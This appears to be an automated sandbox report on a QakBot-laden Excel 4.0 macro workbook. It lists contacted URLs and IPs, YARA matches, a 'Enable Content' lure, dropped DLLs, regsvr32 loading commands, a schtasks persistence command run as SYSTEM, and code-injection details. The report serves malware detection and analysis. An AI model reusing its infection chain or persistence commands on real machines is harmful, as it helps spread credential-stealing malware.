Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://ncus.contentsync.
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://officeapps.live.com
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://onedrive.live.com
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://outlook.office.com/
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://pages.store.office.com/review/query
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://settings.outlook.com
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://store.office.com/addinstemplate
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://tasks.office.com
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://templatelogging.office.com/client/log
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://wus2.contentsync.
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://www.odwebp.svc.ms

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 43.225.55.182:443 -> 192.168.2.3:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.185.33.154:443 -> 192.168.2.3:49723 version: TLS 1.2

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000003.00000002.253198241.0000000000BD0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: QakBot Payload Author: kevoreilly
Source: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, type: MEMORY	Matched rule: QakBot Payload Author: kevoreilly
Source: 4.2.explorer.exe.f50000.0.unpack, type: UNPACKEDPE	Matched rule: QakBot Payload Author: kevoreilly
Source: 4.2.explorer.exe.f50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: QakBot Payload Author: kevoreilly
Source: 3.2.regsvr32.exe.bd0000.2.unpack, type: UNPACKEDPE	Matched rule: QakBot Payload Author: kevoreilly
Source: 3.2.regsvr32.exe.bd0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: QakBot Payload Author: kevoreilly

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4

Screenshot OCR: Enable Content 14 15 16 17 .. . 18 WHY I CANNOT OPEN THIS DOCUMENT ? 19 20 21 W You are usin

Found Excel 4.0 Macro with suspicious formulas

Show sources

Source: audit-1133808478.xlsb

Initial sample: EXEC

Found abnormal large hidden Excel 4.0 Macro sheet

Show sources

Source: audit-1133808478.xlsb

Initial sample: Sheet size: 7504

Office process drops PE file

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\pt[1].htm			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\covi1.dll

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\DBG

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B34CC2	3_2_00B34CC2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B32559	3_2_00B32559
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B33CA2	3_2_00B33CA2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B31DFC	3_2_00B31DFC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B358C5	3_2_00B358C5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B3572B	3_2_00B3572B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B35F18	3_2_00B35F18
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B3111C	3_2_00B3111C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B31000	3_2_00B31000
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B34706	3_2_00B34706
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B34A05	3_2_00B34A05
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B31F7B	3_2_00B31F7B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B33E7B	3_2_00B33E7B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_00F69850	4_2_00F69850
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_00F6A41E	4_2_00F6A41E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_00F6B00E	4_2_00F6B00E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_00F6000A	4_2_00F6000A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_00F52008	4_2_00F52008
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_00F675E0	4_2_00F675E0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_00F529CA	4_2_00F529CA
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_00F53988	4_2_00F53988
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_00F5D55B	4_2_00F5D55B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_00F66D40	4_2_00F66D40
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_00F6FE8F	4_2_00F6FE8F
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_00F6F66B	4_2_00F6F66B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_00F53A2E	4_2_00F53A2E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_00F5DE03	4_2_00F5DE03
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_00F68A00	4_2_00F68A00
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_00F6D7E4	4_2_00F6D7E4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_00F5E355	4_2_00F5E355
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_00F6A718	4_2_00F6A718

Source: C:\Windows\SysWOW64\regsvr32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3360 -s 652

Source: covi1.dll.4.dr

Static PE information: No import functions for PE file found

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior

Source: 00000003.00000002.253198241.0000000000BD0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
Source: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, type: MEMORY	Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
Source: 4.2.explorer.exe.f50000.0.unpack, type: UNPACKEDPE	Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
Source: 4.2.explorer.exe.f50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
Source: 3.2.regsvr32.exe.bd0000.2.unpack, type: UNPACKEDPE	Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
Source: 3.2.regsvr32.exe.bd0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSB@20/20@2/2

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 4_2_00F626A6 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,

4_2_00F626A6

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5672:120:WilError_01
Source: C:\Windows\SysWOW64\explorer.exe	Mutant created: \Sessions\1\BaseNamedObjects\{F4E1DB13-650B-4410-8E14-53724DEB3A20}
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\WERReportingForProcess3056
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\WERReportingForProcess3360
Source: C:\Windows\SysWOW64\explorer.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{F4E1DB13-650B-4410-8E14-53724DEB3A20}
Source: C:\Windows\SysWOW64\explorer.exe	Mutant created: \Sessions\1\BaseNamedObjects\{B7C66CEC-1556-41DB-98E9-9A9D57BAA138}

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{C5F6F81E-1C14-4C4D-9C5D-E8BD652D8F75} - OProcSessId.dat

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe			Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\covi1.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\covi2.dll
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn hoqmcni /tr 'regsvr32.exe -s \'C:\Users\user\covi1.dll\'' /SC ONCE /Z /ST 11:04 /ET 11:16
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\covi1.dll'
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\covi1.dll'
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3360 -s 652
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\covi1.dll'
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\covi1.dll'
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3056 -s 652
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\covi1.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\covi2.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn hoqmcni /tr 'regsvr32.exe -s \'C:\Users\user\covi1.dll\'' /SC ONCE /Z /ST 11:04 /ET 11:16	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\covi1.dll'	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\covi1.dll'	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: audit-1133808478.xlsb	Initial sample: OLE zip file path = xl/media/image2.png
Source: audit-1133808478.xlsb	Initial sample: OLE zip file path = xl/media/image3.png
Source: audit-1133808478.xlsb	Initial sample: OLE zip file path = xl/media/image4.png
Source: audit-1133808478.xlsb	Initial sample: OLE zip file path = xl/media/image5.png
Source: audit-1133808478.xlsb	Initial sample: OLE zip file path = xl/media/image6.png
Source: audit-1133808478.xlsb	Initial sample: OLE zip file path = xl/media/image1.png
Source: audit-1133808478.xlsb	Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 4_2_00F5F1CA LoadLibraryA,GetProcAddress,

4_2_00F5F1CA

Source: covi1.dll.4.dr	Static PE information: section name: .code
Source: covi1.dll.4.dr	Static PE information: section name: .rdataf

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\covi1.dll

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B348FB push 00000000h; mov dword ptr [esp], edx	3_2_00B3493B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B34CC2 push dword ptr [ebp-14h]; mov dword ptr [esp], ecx	3_2_00B34CD1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B34CC2 push 00000000h; mov dword ptr [esp], edi	3_2_00B34D26
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B34CC2 push dword ptr [ebp-10h]; mov dword ptr [esp], eax	3_2_00B34DA4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B34CC2 push dword ptr [ebp-14h]; mov dword ptr [esp], eax	3_2_00B34DEF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B34CC2 push 00000000h; mov dword ptr [esp], edi	3_2_00B35027
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B34CC2 push dword ptr [ebp-14h]; mov dword ptr [esp], eax	3_2_00B350BE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B34CC2 push 00000000h; mov dword ptr [esp], edi	3_2_00B350DE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B34CC2 push dword ptr [ebp-14h]; mov dword ptr [esp], eax	3_2_00B3517F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B34CC2 push 00000000h; mov dword ptr [esp], eax	3_2_00B35240
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B34CC2 push dword ptr [ebp-10h]; mov dword ptr [esp], eax	3_2_00B353FF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B34CC2 push dword ptr [ebp-14h]; mov dword ptr [esp], eax	3_2_00B3546A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B34CC2 push dword ptr [ebp-10h]; mov dword ptr [esp], eax	3_2_00B355A7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B34CC2 push dword ptr [ebp-14h]; mov dword ptr [esp], eax	3_2_00B355B3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B34CC2 push dword ptr [ebp-14h]; mov dword ptr [esp], eax	3_2_00B3560C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B34CC2 push dword ptr [ebp-14h]; mov dword ptr [esp], eax	3_2_00B35779
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B34CC2 push dword ptr [ebp-14h]; mov dword ptr [esp], eax	3_2_00B357C7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B34CC2 push 00000000h; mov dword ptr [esp], edi	3_2_00B35876
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B34CC2 push dword ptr [ebp-10h]; mov dword ptr [esp], eax	3_2_00B35976
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B34CC2 push dword ptr [ebp-10h]; mov dword ptr [esp], eax	3_2_00B359D8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B34CC2 push 00000000h; mov dword ptr [esp], esi	3_2_00B35ADE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B34CC2 push dword ptr [ebp-10h]; mov dword ptr [esp], eax	3_2_00B35B7A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B34CC2 push 00000000h; mov dword ptr [esp], eax	3_2_00B35BAE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B34CC2 push dword ptr [ebp-14h]; mov dword ptr [esp], eax	3_2_00B35BED
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B34CC2 push dword ptr [ebp-14h]; mov dword ptr [esp], eax	3_2_00B35C55
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B34CC2 push dword ptr [ebp-14h]; mov dword ptr [esp], eax	3_2_00B35C61
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B34CC2 push dword ptr [ebp-14h]; mov dword ptr [esp], eax	3_2_00B35CC9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B34CC2 push dword ptr [ebp-10h]; mov dword ptr [esp], eax	3_2_00B35D07
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B34CC2 push dword ptr [ebp-14h]; mov dword ptr [esp], eax	3_2_00B35D13
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B34CC2 push dword ptr [ebp-14h]; mov dword ptr [esp], eax	3_2_00B35D5A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_00B34CC2 push 00000000h; mov dword ptr [esp], edx	3_2_00B35D85

Persistence and Installation Behavior:

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\pt[1].htm			Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe	File created: C:\Users\user\covi1.dll			Jump to dropped file

Source: C:\Windows\SysWOW64\explorer.exe

File created: C:\Users\user\covi1.dll

Jump to dropped file

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\pt[1].htm

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Windows\SysWOW64\explorer.exe

File created: C:\Users\user\covi1.dll

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\Windows\SysWOW64\explorer.exe

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn hoqmcni /tr 'regsvr32.exe -s \'C:\Users\user\covi1.dll\'' /SC ONCE /Z /ST 11:04 /ET 11:16

Hooking and other Techniques for Hiding and Protection:

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe

Memory written: PID: 5828 base: 123F380 value: E9 6F 53 D1 FF

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
